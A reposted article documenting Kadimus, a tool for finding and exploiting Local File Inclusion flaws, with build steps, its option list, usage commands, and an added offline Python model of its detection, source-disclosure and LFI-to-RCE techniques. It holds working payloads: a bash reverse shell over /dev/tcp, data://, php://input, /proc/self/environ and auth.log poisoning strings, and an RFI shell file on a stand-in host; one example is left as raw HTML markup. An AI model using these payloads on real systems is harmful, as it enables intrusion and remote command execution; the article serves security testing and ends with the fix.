Kadimus is a security tool for detecting, and then exploiting, Local File Inclusion (LFI) vulnerabilities in web applications.
Features
    Tests every URL parameter
    /var/log/auth.log RCE
    /proc/self/environ RCE
    php://input RCE
    data://text RCE
    Source code disclosure detection
    Multi-threaded scanning
    Command shell over HTTP requests
    Proxy support (socks4://, socks4a://, socks5://, socks5h:// and http://)
Build
Kadimus needs three libraries: libcurl for the HTTP requests, libpcre for response matching, and libssh for the SSH login attempts used by the auth.log technique.
Install libcurl:
CentOS/Fedora
    # yum install libcurl-devel
Debian based
    # apt-get install libcurl4-openssl-dev
Install libpcre:
CentOS/Fedora
    # yum install libpcre-devel
Debian based
    # apt-get install libpcre3-dev
Install libssh:
CentOS/Fedora
    # yum install libssh-devel
Debian based
    # apt-get install libssh-dev
Finally, clone and build:
    $ git clone https://github.com/P0cL4bs/Kadimus.git
    $ cd Kadimus
    $ make
Options
     -h, --help                   Display this help menu

    Request:
      -B, --cookie STRING          Set custom HTTP Cookie header
      -A, --user-agent STRING      User-Agent to send to server
      --connect-timeout SECONDS    Maximum time allowed for connection
      --retry-times NUMBER         Number of times to retry if connection fails
      --proxy STRING               Proxy to connect, syntax: protocol://hostname:port

    Scanner:
      -u, --url STRING             Single URI to scan
      -U, --url-list FILE          File containing URIs to scan
      -o, --output FILE            File to save output results
      --threads NUMBER             Number of threads (2..1000)

    Exploitation:
      -t, --target STRING          Vulnerable target to exploit
      --inject-at STRING           Parameter name to inject the exploit into
                                   (only needed with the data RCE technique and source disclosure)

    RCE:
      -X, --rce-technique=TECH     LFI to RCE technique to use
      -C, --code STRING            Custom PHP code to execute, including the PHP tags
      -c, --cmd STRING             Execute a system command on the vulnerable target
      -s, --shell                  Simple command shell interface through HTTP requests

      -r, --reverse-shell          Try to spawn a reverse shell connection
      -l, --listen NUMBER          Port to listen on

      -b, --bind-shell             Try to connect to a bind shell
      -i, --connect-to STRING      IP/hostname to connect to
      -p, --port NUMBER            Port number to connect to

      --ssh-port NUMBER            SSH port to use when injecting the command (default: 22)
      --ssh-target STRING          SSH host to log in against

    RCE available techniques:
      environ                      Try to run PHP code using /proc/self/environ
      input                        Try to run PHP code using php://input
      auth                         Try to run PHP code using /var/log/auth.log
      data                         Try to run PHP code using data://text

    Source Disclosure:
      -G, --get-source             Try to get the source files using filter://
      -f, --filename STRING        Filename to grab the source of [REQUIRED]
      -O FILE                      Output file (default: stdout)
Usage examples
Scanning a single URL with a custom User-Agent, or a list of URLs with ten threads:
    ./kadimus -u localhost/?pg=contact -A my_user_agent
    ./kadimus -U url_list.txt --threads 10 --connect-timeout 10 --retry-times 0
Retrieving a file's source (the php://filter base64 wrapper returns the file encoded instead of executing it; Kadimus decodes it into the output file):
    ./kadimus -t localhost/?pg=contact -G -f "index.php" -O local_output.php --inject-at pg
Executing PHP code (the code is sent in the POST body and reached through php://input, which requires allow_url_include=On on the target):
    ./kadimus -t localhost/?pg=php://input -C '<?php echo "pwned"; ?>' -X input
命令执行:
1 |
<span class="pun">./</span><span class="pln">kadimus </span><span class="pun">-</span><span class="pln">t localhost</span><span class="pun">/?</span><span class="pln">pg</span><span class="pun">=/</span><span class="pln">var</span><span class="pun">/</span><span class="pln">log</span><span class="pun">/</span><span class="pln">auth</span><span class="pun">.</span><span class="pln">log </span><span class="pun">-</span><span class="pln">X auth </span><span class="pun">-</span><span class="pln">c </span><span class="str">'ls -lah'</span><span class="pln"> </span><span class="pun">--</span><span class="pln">ssh</span><span class="pun">-</span><span class="pln">target localhost</span> |
Checking for Remote File Inclusion (RFI): the check makes the target include the file at the URL given in the comment, so that file has to be hosted with the content below. The base64 string decodes to a fixed marker text ("scorpion say get over here"), which is what Kadimus looks for in the response:
    /* http://bad-url.com/shell.txt */
    <?php echo base64_decode("c2NvcnBpb24gc2F5IGdldCBvdmVyIGhlcmU="); ?>
Reverse shell (-Xdata is -X data; -l 12345 makes Kadimus listen on that port, and the connect-back address in the payload must be reachable from the target, which 127.0.0.1 only is because the target here is localhost):
    ./kadimus -t localhost/?pg=contact.php -Xdata --inject-at pg -r -l 12345 -c 'bash -i >& /dev/tcp/127.0.0.1/12345 0>&1' --retry-times 0
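The checks the examples above drive (parameter-by-parameter LFI detection from the feature list, php://filter source disclosure, and the data, input, environ and auth RCE techniques from the options listing), modelled in pure Python as an added example. This is not Kadimus code (Kadimus itself is C). The target web app, its filesystem, the sshd log line, the URL http://localhost/index.php?pg=contact.php and all function names are constructed here so the script runs offline; only the payload strings are the ones a real LFI scanner sends.

```python
"""Pure-Python model of what Kadimus automates: LFI detection, php://filter source
disclosure and the data / input / environ / auth LFI-to-RCE techniques. Added example,
not Kadimus code; the target is a constructed stand-in for include($_GET['pg'])."""
import base64
import posixpath
import re
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

WEBROOT = "/var/www"
WARN = "Warning: include(): failed to open stream"
FAKE_FS = {  # constructed target filesystem
    "/etc/passwd": "root:x:0:0:root:/root:/bin/bash\nwww-data:x:33:33::/var/www:/usr/sbin/nologin\n",
    "/var/www/index.php": "<?php include($_GET['pg']); ?>",
    "/var/www/contact.php": "<h1>Contact</h1>",
    "/var/log/auth.log": "",
}
PHP_TAG = re.compile(r"<\?php\s*(.*?)\s*\?>", re.S)

def php_eval(source):
    """Toy PHP interpreter: text outside <?php ?> is copied, `echo "...";` inside it is run."""
    def run(m):
        e = re.fullmatch(r'echo\s+"([^"]*)";?', m.group(1).strip())
        return e.group(1) if e else ""
    return PHP_TAG.sub(run, source)

def resolve(path):
    """The file include() would open for a relative or traversal path from the webroot."""
    return posixpath.normpath(path if path.startswith("/") else posixpath.join(WEBROOT, path))

def vulnerable_app(url, headers=None, body=""):
    """Simulated index.php. Wrapper handling mirrors PHP: data:// and php://input are included
    as code, php://filter base64-encodes instead of executing, /proc/self/environ reflects the
    User-Agent (true for some SAPIs only), everything else is read from FAKE_FS."""
    pg = dict(parse_qsl(urlsplit(url).query)).get("pg", "")
    if pg.startswith("data://text/plain,"):
        source = pg[len("data://text/plain,"):]
    elif pg == "php://input":
        source = body
    elif pg.startswith("php://filter/convert.base64-encode/resource="):
        raw = FAKE_FS.get(resolve(pg.split("resource=", 1)[1]))
        return WARN if raw is None else base64.b64encode(raw.encode()).decode()
    elif pg == "/proc/self/environ":
        source = "HTTP_USER_AGENT=%s\x00PATH=/usr/bin\x00" % (headers or {}).get("User-Agent", "")
    else:
        source = FAKE_FS.get(resolve(pg))
    return WARN if source is None else php_eval(source)

def fake_sshd_login_attempt(username):
    """Stand-in for `ssh '<username>'@target`: sshd logs the rejected name verbatim."""
    FAKE_FS["/var/log/auth.log"] += "sshd[1337]: Invalid user %s from 10.0.0.5 port 40000\n" % username

# ------------------------------------------------------------------ scanner side
TRAVERSAL_PAYLOADS = ["../" * n + "etc/passwd" for n in range(1, 7)] + ["/etc/passwd"]
PASSWD_SIG = re.compile(r"root:.?:0:0:")

def with_param(url, name, value):
    """Return url with query parameter `name` set to `value`, other parameters kept."""
    parts = urlsplit(url)
    qs = dict(parse_qsl(parts.query))
    qs[name] = value
    return urlunsplit(parts._replace(query=urlencode(qs)))

def scan_lfi(url, fetch):
    """Detection: for every query parameter try the traversal payloads and report the
    first one whose response carries an /etc/passwd root entry."""
    hits = []
    for name, _ in parse_qsl(urlsplit(url).query):
        for payload in TRAVERSAL_PAYLOADS:
            if PASSWD_SIG.search(fetch(with_param(url, name, payload))):
                hits.append((name, payload))
                break
    return hits

def get_source(url, param, filename, fetch):
    """Source disclosure: the base64 filter keeps the file from executing, so the server
    returns its code encoded; decode it locally. None if the wrapper was not honoured."""
    resp = fetch(with_param(url, param, "php://filter/convert.base64-encode/resource=" + filename))
    try:
        return base64.b64decode(resp, validate=True).decode()
    except ValueError:  # binascii.Error; the PHP warning text is not valid base64
        return None

def rce(url, param, technique, php_code, fetch):
    """Send the request each LFI-to-RCE technique relies on; return the response body."""
    if technique == "data":     # code travels inside the included URL itself
        return fetch(with_param(url, param, "data://text/plain," + php_code))
    if technique == "input":    # code travels in the POST body
        return fetch(with_param(url, param, "php://input"), body=php_code)
    if technique == "environ":  # code travels in the User-Agent header
        return fetch(with_param(url, param, "/proc/self/environ"), headers={"User-Agent": php_code})
    if technique == "auth":     # log poisoning: plant the code as an SSH username, then include the log
        fake_sshd_login_attempt(php_code)
        return fetch(with_param(url, param, "/var/log/auth.log"))
    raise ValueError("unknown technique: " + technique)

if __name__ == "__main__":
    URL = "http://localhost/index.php?pg=contact.php"  # constructed target URL
    print(scan_lfi(URL, vulnerable_app), get_source(URL, "pg", "index.php", vulnerable_app))
    for t in ("data", "input", "environ", "auth"):
        print(t, repr(rce(URL, "pg", t, '<?php echo "pwned"; ?>', vulnerable_app)))
```

Two things the model makes visible that the one-line commands hide. First, each technique has a precondition on the target, not just on the scanner: data:// and php://input are only included when allow_url_include is on, /proc/self/environ only carries the User-Agent under some SAPIs, and /var/log/auth.log has to be readable by the web server user while the SSH attempt that poisons it leaves its own log entry. Second, the only real fix is on the application side: never hand user input to include(); map the parameter to an allowlisted page name instead, which defeats every wrapper and traversal payload above at once.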
[Compiled by phper; reproduction must credit FreeBuf (FreeBuf.COM)]
Reposted from Legend's BLog: "Local File Inclusion (LFI) vulnerability detection tool – Kadimus" (reproduction requires attribution).